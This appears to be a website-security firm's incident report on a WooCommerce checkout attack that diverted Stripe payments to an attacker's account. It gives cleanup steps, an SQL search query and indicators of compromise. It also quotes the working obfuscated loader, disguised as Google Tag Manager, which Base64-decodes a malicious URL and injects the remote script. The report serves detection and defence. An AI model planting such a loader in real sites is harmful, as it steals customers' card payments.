Recently, we investigated a case where a customer completed a payment using a WooCommerce checkout link created directly by the site owner. The client’s credit card was successfully charged, confirming that the transaction went through. However, the order never appeared in the WooCommerce dashboard and there was no corresponding record in the merchant’s legitimate Stripe account.
Try our free site check.
A malware analyst will provide a security report for your website.
Further investigation revealed another alarming detail: the client’s bank reported that the charge appeared to originate from a foreign location unrelated to the business.
In other words, the payment was processed somewhere — but not by the intended Stripe merchant account.
In this guide we will explain how this type of WooCommerce payment interception attack works, the warning signs that indicate your checkout may have been compromised, and the steps required to investigate and secure an affected website.
Steps taken in addressing the malware contamination:
- Created a full backup of the database and website files.
- Identified and removed the malicious JavaScript injected into the website and loaded from an external domain (malicious snippet found in “ihaf_insert_footer”).
- Performed a full manual scan of the website files and database to locate and remove backdoors.
- Analyzed the payment logs and submitted a report to Stripe, including the attacker’s Stripe account and the associated PaymentIntent IDs.
- Secured the website by applying all necessary updates and carefully inspecting its components.
Attacker Stripe account:
acct_1SfQn2HYEuofo2d9
OLTRADING EOOD
Bulgaria
www.notreadyyet.com
[email protected]
Hosting account (provided by Cloudflare)
Podaon SIA
[email protected]
Here is an example of an obfuscated JavaScript loader disguised as Google Tag Manager, which dynamically injects an external script from a malicious domain using Base64 decoding (atob).
The code was found in the database during the cleanup process. To locate it, we ran the following SQL command:
SELECT option_name FROM wp_options WHERE option_value LIKE '%atob(%';
<!-- Google Tag Manager -->
<script>
!function(e,a,n,t,o,r,c){e.GoogleTagManagerLoaderScript=o;r=a.createElement(t),c=a.getElementsByTagName(t)[0],r.async=1,r.src=e.atob(\"aHR0cHM6Ly9zdHlsZW1hbnNpc2ZvcmVhbC5jb20vMy9hYnJvYWRlZXovdmVuZG9yLmNodW5rLnJsazlxZy5qcw==\"),c.parentNode.insertBefore(r,c)}(window,document,0,\"script\",\"always\");
</script>
<!-- End Google Tag Manager -->
Malicious JavaScript injected into checkout to divert Stripe payments to an attacker-controlled account.
hxxps://stylemansisforeal[.]com/3/…/vendor.chunk.rlk9qg.js
